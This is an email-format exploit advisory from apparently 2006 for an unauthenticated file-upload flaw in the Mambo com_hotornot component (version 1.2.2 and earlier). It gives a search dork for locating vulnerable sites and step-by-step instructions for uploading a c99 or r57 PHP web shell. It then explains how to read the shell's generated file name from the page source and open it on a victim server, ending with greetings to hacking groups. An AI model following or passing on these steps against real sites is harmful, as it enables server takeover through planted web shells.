------=_Part_262466_33113660.1158601122097 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline ######################################################################## # Mambo com_hotornot <= 1.2.2 Remote File Upload Exploit # # Download Source : http://mamboxchange.com/projects/hotornot/ # Dork = allinurl:com_hotornot # # Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com # Location: Indonesia ######################################################################### file ; uploadfile.php ######################################################################## bugs ; Remote User can Upload anything files without Identification ######################################################################### example and methode exploit ; -> open u'r browser http://victim.xxx/components/com_hotornot/uploadfile.php? -> upload u'r shell (c99shell.php or r57shell.php) remember .php not .txt or others -> u can see error page; Failed: $AvailableImageOutputFormats = array(text;wbmp;png;jpeg) in file " phpthumb.class.php " on line 473 bla...bla...bla..bla Step 2 -> View page source this page, find with u'r file name(c99shell.php),u can see like this -> now u can acces c99shell.php http://victim.xxx/components/com_hotornot/hotornot/20060918001128_c99shell.php ? -> done ######################################################################## Thanks; str0ke milw0rm google #e-c-h-o (all member echo community) #nyubi (all member solpotcrew community) person; y3dips, lirva32, the_day,(&all echo staff) ghoz, home_edition2001, iFX, and for all (friend's&enemy) ------=_Part_262466_33113660.1158601122097 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline ########################################################################
# Mambo com_hotornot <= 1.2.2 Remote File Upload Exploit
#  
# Download Source  : http://mamboxchange.com/projects/hotornot/
# Dork =  allinurl:com_hotornot
#
# Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com
# Location: Indonesia
#########################################################################
file ;
uploadfile.php
########################################################################
bugs ;
Remote User can Upload anything files without Identification
#########################################################################
example and methode exploit ;

-> open u'r browser
http://victim.xxx/components/com_hotornot/uploadfile.php?
-> upload u'r shell ( c99shell.php or r57shell.php) remember .php not .txt or others

-> u can see error page;
Failed: $AvailableImageOutputFormats = array(text;wbmp;png;jpeg) in file "phpthumb.class.php
" on line 473
bla...bla...bla..bla
Step 2

-> View page source this page, find with u'r file name(c99shell.php),u can see like this
<input type="hidden" value="20060918001128_c99shell.php" name="userfile">

-> now u can acces c99shell.php
http://victim.xxx/components/com_hotornot/hotornot/20060918001128_c99shell.php?

-> done
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
person; y3dips, lirva32, the_day,(&all echo staff) ghoz, home_edition2001, iFX, and for all (friend's&enemy)

------=_Part_262466_33113660.1158601122097--